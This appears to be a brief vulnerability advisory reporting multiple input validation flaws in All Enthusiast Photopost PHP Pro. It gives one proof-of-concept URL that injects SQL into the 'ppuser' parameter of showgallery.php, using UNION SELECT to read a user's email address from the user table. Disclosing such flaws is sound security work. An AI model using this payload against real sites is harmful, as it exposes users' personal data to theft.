All Enthusiast Photopost PHP Pro Multiple Input Validation Vulnerabilities

All Enthusiast Photopost PHP Pro Multiple Input Validation Vulnerabilities

No exploit is required to carry out a successful attack.

The following proof of concept example to exploit the SQL injection issue in 'ppuser' parameter is available:

http://www.example.com/showgallery.php?ppuser=-2'%20UNION%20SELECT%200,email,
0,0,0,0,0,0%20FROM%20user%20WHERE%20userid='1&cat=500